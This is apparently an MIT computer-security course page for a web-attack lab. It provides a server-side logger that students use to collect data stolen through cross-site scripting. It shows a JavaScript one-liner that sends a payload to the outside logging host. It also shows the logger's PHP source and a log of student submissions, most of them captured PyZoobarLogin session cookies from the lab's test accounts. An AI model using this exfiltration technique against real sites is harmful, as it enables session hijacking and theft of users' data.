You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2026/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Wed, 27 May 2026 01:18:27 +0000: nhatbui: PyZoobarLogin=grader#37df35b6c4cb5b3ce1309c81dfb8ac71a57b7169efb8682907b76838f1818c57 Wed, 27 May 2026 01:13:39 +0000: nhatbui: PyZoobarLogin=grader#30e65601fbfc46a443ae50f50cc903667d9dce28b853d0bec0a91e9955e62d8e Wed, 27 May 2026 01:03:41 +0000: nhatbui: hello Wed, 27 May 2026 01:02:50 +0000: nhatbui: PyZoobarLogin=nhat#d7732a08b18e03a067b614d90a3fbd7894f0dfa64414d042ebccec28e2784cf6 Wed, 27 May 2026 01:02:00 +0000: nhatbui: PyZoobarLogin=nhat#d7732a08b18e03a067b614d90a3fbd7894f0dfa64414d042ebccec28e2784cf6 Wed, 27 May 2026 00:50:43 +0000: nhatbui: hello Wed, 27 May 2026 00:47:25 +0000: my-username: some-string Wed, 27 May 2026 00:47:17 +0000: nhatbui: hello Wed, 27 May 2026 00:46:57 +0000: my-username: some-string Wed, 27 May 2026 00:44:53 +0000: my-username: some-string Wed, 27 May 2026 00:44:43 +0000: my-username: some-string Tue, 26 May 2026 03:23:44 +0000: mati: PyZoobarLogin=grader#30f58ecedb55851e869409a9cfcc700456ff0a8b5ea388b28b4d773680f06a1c Tue, 26 May 2026 03:23:39 +0000: mati: PyZoobarLogin=grader#531e23fb7332e210555d1ab40ef93c008dd5ad9ab8c49dffcfe253f45184b1ec Tue, 26 May 2026 03:23:31 +0000: mati: PyZoobarLogin=grader3#66152c96f49d1903fe1fa6b06431a5c728ae7fd350a3d069fb44c0a0d04b7621 Tue, 26 May 2026 03:23:26 +0000: mati: PyZoobarLogin=grader2#c72e920f26102008e086eda2cc099e0f6d11c55856ef50e5be44dd612f5b5fef Tue, 26 May 2026 03:23:22 +0000: mati: PyZoobarLogin=grader1#097ee277f82b7a8a3d8c5d701b4557525c9bee28bb32fb50c0fce3101752f867 Mon, 25 May 2026 17:16:55 +0000: epic: grader/KVBYXEKEWRBG Mon, 25 May 2026 17:16:39 +0000: epic: grader/CXYEMTIGJXIH Mon, 25 May 2026 17:15:26 +0000: OLA: PyZoobarLogin=grader#a8b84f6024bcb5a287164fa2ff3b8aae7896b8f69847df0ea4b0da886ef38cdb Mon, 25 May 2026 17:15:09 +0000: xdd: PyZoobarLogin=grader#b8c291cf5aa1169379cdbbe652ab82949e3ce5ae118a549c03c981c3294ffb0b Mon, 25 May 2026 17:14:32 +0000: xd: PyZoobarLogin=grader#a0e5d827ce5af480a30316e435f382d7492ab6a27ef61e7c0e8c271bf8a514ea Mon, 25 May 2026 17:00:39 +0000: epic: grader/CSZCSISNWBYE Mon, 25 May 2026 17:00:21 +0000: epic: grader/TBKJVRMKDOKX Mon, 25 May 2026 16:59:14 +0000: OLA: PyZoobarLogin=grader#ca0b63dde8f0ae6cd9d763500516ecdd9e632a8cabb9839d60654b25213b2943 Mon, 25 May 2026 16:58:57 +0000: xdd: PyZoobarLogin=grader#f8f8bf1e6766cfcf6c3f8e1344299308c833624b5c154b1968cd4e0ab4149096 Mon, 25 May 2026 16:58:22 +0000: xd: PyZoobarLogin=grader#ec706e3866e5fe200005824c3c036758ca2cc34c80205dadfefb4766e6e1cc96 Mon, 25 May 2026 16:54:21 +0000: epic: grader/OMEMXOBSYVHN Mon, 25 May 2026 16:54:04 +0000: epic: grader/RHMNLFLXGAMG Mon, 25 May 2026 16:52:51 +0000: OLA: PyZoobarLogin=grader#7ef2dad6ca4f2449d29401e77e50773d257f1ff2d7a37aeacd901ddd855d19a6 Mon, 25 May 2026 16:52:35 +0000: xdd: PyZoobarLogin=grader#7a93207e5e0cb10e703e5a79e4ebf27d964b4f5458a17cc7312b7b7db307e2e6 Mon, 25 May 2026 16:52:00 +0000: xd: PyZoobarLogin=grader#2f432c92e021b1331170ac721b4c9d629c7c82859ef2c1cabad76463a8fb7cf8 Mon, 25 May 2026 16:47:13 +0000: epic: grader/JZMZZAKJDQTM Mon, 25 May 2026 16:46:54 +0000: epic: grader/KIOQZBMPYGCU Mon, 25 May 2026 16:45:50 +0000: OLA: PyZoobarLogin=grader#6410928b182f4121501883f1030b047bb7ae988182c73f495af14e66b0ed5209 Mon, 25 May 2026 16:45:28 +0000: xdd: PyZoobarLogin=grader#6174a544f9dcb09987a7c4bf3a012e83e0fc2edda0c86625897ff0f508e12b81 Mon, 25 May 2026 16:44:46 +0000: xd: PyZoobarLogin=grader#4b06c954f4b41e13b0ce54773e4d3af28ecc9c239aab893d7f1f0a5516641c6c Thu, 21 May 2026 23:05:33 +0000: epic: grader/JTTPPECWRJBI Thu, 21 May 2026 23:05:09 +0000: epic: grader/OPBHVWDWUCVO Thu, 21 May 2026 23:03:45 +0000: OLA: PyZoobarLogin=grader#5ba86b522d11005e6309bee8b19f6024307e38ca7041737e0d442aeacbd577a0 Thu, 21 May 2026 23:03:25 +0000: xdd: PyZoobarLogin=grader#7623f1b78018fce80949a55d8a69e28d8d9fc779a0a48043a17598fd1a550808 Thu, 21 May 2026 23:02:46 +0000: xd: PyZoobarLogin=grader#d8581a9922166a46efad126aa22275e6ceb16347d9721dbdea84be4fc71a4d2b Thu, 21 May 2026 22:44:32 +0000: OLA: PyZoobarLogin=grader#aa2c17b9e5624b09a45eaeffc6091a7fee4d4b697da9044ab0183ab34f990daf Thu, 21 May 2026 22:44:09 +0000: xdd: PyZoobarLogin=grader#7144ea6503502927a17cfd5af6dc96882556b94e6625d8449c11dfbdcbae357f Thu, 21 May 2026 22:43:25 +0000: xd: PyZoobarLogin=grader#414ff1813720146f9c7c35a0ca7c5a3a39813c84f8715d223dd0f6c551060f8e Thu, 21 May 2026 22:30:38 +0000: OLA: test Thu, 21 May 2026 22:04:22 +0000: OLA: PyZoobarLogin=grader#7c6a4a43f04869d28aa58ce461347fbd3711589468e9c188deafb3a9c995588b Thu, 21 May 2026 22:04:02 +0000: xdd: PyZoobarLogin=grader#1d5aef769057819f280ff43c87a2c16b9e961bcace08d30a4bd9a4c1f00a08e6 Thu, 21 May 2026 22:03:21 +0000: xd: PyZoobarLogin=grader#79ea54f60681237c8a060d4ac414f63a912b7e3962a0e03d2ae94283d4ce503b Wed, 20 May 2026 00:23:57 +0000: OLA: PyZoobarLogin=grader#fe1395d311d1ecc1b60f278d78fcdb7814dced8300556be102a547805b9d5f52 Wed, 20 May 2026 00:23:37 +0000: xdd: PyZoobarLogin=grader#bd7230ea2ad8b6aef8c842e36c347182c820cf5830a789990c9ab062c1ccdbe6 Wed, 20 May 2026 00:22:57 +0000: xd: PyZoobarLogin=grader#a39c37b3af810bb571893f75ccb5e793baac8dcff97319a9a07379e3dc704002 Wed, 20 May 2026 00:17:46 +0000: xdd: PyZoobarLogin=grader#ad7f7b3f011e5c82b9b8bf524de590875dd4da2a47cf7b0fe005c082f45b4230 Wed, 20 May 2026 00:17:05 +0000: xd: PyZoobarLogin=grader#c39bb4cb0b291c6f30a74a83b88c55b27bb8602a88893a6355a6f9dc17ab0924 Wed, 20 May 2026 00:13:02 +0000: OLA: PyZoobarLogin=grader#42a93c1428dd9d3857b244baa95fd8ea22e8370004610f0b1185820d9c598a0a Wed, 20 May 2026 00:12:42 +0000: xdd: PyZoobarLogin=grader#939da99c186f8704ae806a39466e58a3a40f790af24a44540765a61839b9a7e4 Wed, 20 May 2026 00:12:02 +0000: xd: PyZoobarLogin=grader#df27f96b81cd06042c16c0eb88f483ab65b29d91c8f414d6ee4cd1805fcadf63 Wed, 20 May 2026 00:09:32 +0000: OLA: PyZoobarLogin=grader#5029ab436e1b8cae72c621a3df095beca9c4f23668330a4f6599f80b80d79549 Wed, 20 May 2026 00:09:12 +0000: xdd: PyZoobarLogin=grader#13590452eeaa4713427144e549a1a89ea6cf64ea4a482846e940f4d1b0a3f336 Wed, 20 May 2026 00:08:32 +0000: xd: PyZoobarLogin=grader#7cdfe484bc75475fa1d922af251a2ef48a86ff32f60817b2a29bc8eb58203eac Wed, 20 May 2026 00:03:51 +0000: OLA: PyZoobarLogin=grader#46552eff7e763e72cf32008a4f00c1e931bcd0d961075f2a4a6c8f0d0404b448 Wed, 20 May 2026 00:03:30 +0000: xdd: PyZoobarLogin=grader#81f1293b533d9664cb8b74194fa49e033c896e6b804d18e704e3196e14cdf05c Wed, 20 May 2026 00:02:38 +0000: xd: PyZoobarLogin=grader#da9927afe15ca8974f97161660f648172d94c1c7b368182699379d3d0063c11f Tue, 19 May 2026 23:56:43 +0000: OLA: PyZoobarLogin=grader#5e609f0b46d6961ccb40b0a11b806848c2e93d45ee351ee2acb3528a178d2cf8 Tue, 19 May 2026 23:56:23 +0000: xdd: PyZoobarLogin=grader#ac3683bb4040859a72a40ee6af9e7799e98629c36620208cb3541c0c8a5a1887 Tue, 19 May 2026 23:55:43 +0000: xd: PyZoobarLogin=grader#375c727f43796ffa26b487c119373b5c502d810dedf120b7efc9d24f2be8727c Tue, 19 May 2026 23:50:35 +0000: OLA: PyZoobarLogin=grader#f2433927926cbeab7dc5e4879f15581269827cddeb3ba140900ed76eb20c7b0f Tue, 19 May 2026 23:50:14 +0000: xdd: PyZoobarLogin=grader#e91e1d9e76d3adfa1e3d1806aded9f25cf60a9f0d67a43cb7b11c2475498fc56 Tue, 19 May 2026 23:49:33 +0000: xd: PyZoobarLogin=grader#c35936fca988fce8c640b77c9cdfc05f5e7b06596fb7be7f447e826db3536a22 Tue, 19 May 2026 23:43:42 +0000: OLA: PyZoobarLogin=grader#5fdc1b98d02395e10e15906d38e0669dd0c6938fb8ecfbe6e91c2f769d77e400 Tue, 19 May 2026 23:43:22 +0000: xdd: PyZoobarLogin=grader#ac04955cd6196cd4ac2d25cb9b778dcd49e8358b8ec076c6745193c8f32c4c1e Tue, 19 May 2026 23:42:42 +0000: xd: PyZoobarLogin=grader#39bfdcf4bcc9fe667ccdb8f2f25a1c1356df8a0bf6dba544e7b87d5677ee6223 Tue, 19 May 2026 23:37:36 +0000: OLA: PyZoobarLogin=grader#88b26e78546937aa17cd58a9ca55940e083d52a011896889cd996f23807e01c8 Tue, 19 May 2026 23:37:16 +0000: xdd: PyZoobarLogin=grader#6a25fe423475340d315c4a08ee45bc6c634507cc25ee378750469a45ab72ce59 Tue, 19 May 2026 23:36:35 +0000: xd: PyZoobarLogin=grader#50fb02e0c1967a613909119b441567d0f82f75cc658e64e4c22d9c1bf2223f80 Tue, 19 May 2026 23:31:39 +0000: OLA: PyZoobarLogin=grader#2e6018e75f670dcaa67ade317f1a28f9d212de74ec50535351c01ee12e6901e1 Tue, 19 May 2026 23:31:20 +0000: xdd: PyZoobarLogin=grader#79fb023b92f074f010e053882997ee0da82742fa8a0fb2def9ee8b5272e9fcbb Tue, 19 May 2026 23:30:39 +0000: xd: PyZoobarLogin=grader#c3b9e8412c5c6e15907369e18ecdca4dc53cd45cb5496804deb029994db2448e Tue, 19 May 2026 23:23:29 +0000: OLA: PyZoobarLogin=grader#6b0eafd413e8821cdfde4e2a3c7ea4c7210454e94c314b9f3cfecf3a4e4845a5 Tue, 19 May 2026 23:23:09 +0000: xdd: PyZoobarLogin=grader#dd771f559aef2baf3479512dc19456beb8445bd9c1144acac022aa0c240864f0 Tue, 19 May 2026 23:22:29 +0000: xd: PyZoobarLogin=grader#b027539c0933b8a6102ce07a64e01626683158f625f7cee758a36a14401e341f Tue, 19 May 2026 23:18:49 +0000: OLA: PyZoobarLogin=grader#10cddd6964bd7fd9f30c66334867f321675e5fb822f9bd187427c957f63ca620 Tue, 19 May 2026 23:18:29 +0000: xdd: PyZoobarLogin=grader#1c56a8e75317bc1a8cd183560d52f76385aa287917e95b3af5a6f48b277e7d66 Tue, 19 May 2026 23:17:42 +0000: xd: PyZoobarLogin=grader#9c25c031b73d5b1601e588c3275d7ce364cb13eb31926b7ed6d11c3338668943 Tue, 19 May 2026 23:11:44 +0000: OLA: PyZoobarLogin=grader#c8a6a0bbbfeacbf8d6b6bf335fc19078e248d02ffb30b1e9cb1e767f03a8de58 Tue, 19 May 2026 23:11:24 +0000: xdd: PyZoobarLogin=grader#a0c835e1d0ed416ca2358b134c3777e527af062fdd4200c0d9892fc7a52ff34c Tue, 19 May 2026 23:10:44 +0000: xd: PyZoobarLogin=grader#f098753aa9a729ab2336a34f14105aebcf395062f6180653d9d7ee87b6327410 Tue, 19 May 2026 23:06:12 +0000: xdd: PyZoobarLogin=grader#2a1bb8c512886b26192dce9db480104b5b9a9ba8ee8b939144657cd768a63c2c Tue, 19 May 2026 23:05:32 +0000: xd: PyZoobarLogin=grader#b1c7221cad7c295faf1d19f13b0bb01194e548da4ab175e896c91ff97ab301c6 Tue, 19 May 2026 22:57:30 +0000: OLA: PyZoobarLogin=grader#5e40c8db5bc138342e749af0f9d641a3de8a6172055537c494cd69bbb23db2d2 Tue, 19 May 2026 22:57:09 +0000: xdd: PyZoobarLogin=grader#aeec32237bb47416eee724ee25b4e0dbaf4f60d441cb6ba2f712988040e005a7 Tue, 19 May 2026 22:56:26 +0000: xd: PyZoobarLogin=grader#2989db55b966b1dca5e4ccd8d702384114ffc915498dd16141617f440db3d578 Tue, 19 May 2026 22:48:48 +0000: xdd: PyZoobarLogin=grader#2d9a3d720fd49b864984bcdb155d858d2032880fba59efb26c74f4102fddc88b Tue, 19 May 2026 22:48:07 +0000: xd: PyZoobarLogin=grader#49fc32a362d8b8b37401c5d06bc52f7c12758288d2aa1e140ce6934eb0320d55 Tue, 19 May 2026 22:43:19 +0000: xdd: PyZoobarLogin=grader#f8cfd04646ca5da50132bdc327935bc0a98030e930a791c4c46cb21f884d87c7 Tue, 19 May 2026 22:42:39 +0000: xd: PyZoobarLogin=grader#d0ce0308195dae6834872567a82d15ef07ca46e74c7bb99731c6b54ae89d7249 Tue, 19 May 2026 22:34:06 +0000: xd: PyZoobarLogin=grader#2152ac2e48604ceda46ae80b7edc594de69494eec3ad2f9c5135e160051f3ac7 Tue, 19 May 2026 21:42:02 +0000: xd: PyZoobarLogin=grader#64829042ec8a172dce1011c8fa43b836937c91044a951d126ec039c90933b515 Tue, 19 May 2026 21:38:43 +0000: xd: PyZoobarLogin=grader#b527dec7a578a2cfbafcfe0392c2ccb56fe4f66697169ec3b21317acac3cd363 Fri, 15 May 2026 20:30:37 +0000: idfk: PyZoobarLogin=grader#342ec62fd940cf83fd53bb5a90b2b2ee5104485dad2b49c944c35b74eb1f806e Fri, 15 May 2026 20:30:29 +0000: idfk: PyZoobarLogin=grader#42bd43741ae6b24e32c4e2de71ff85e4be345f86102db280b1a08796775f8264 Fri, 15 May 2026 20:30:13 +0000: idfk: PyZoobarLogin=grader#28ddfd085339398e1710a90125108aef606bdc54ead66103f762350a98ee39c1
In case you are curious, here is the source code of this page.
<?php header("Access-Control-Allow-Origin: *"); do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.566-2026-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.566/2026/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.566-2026-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>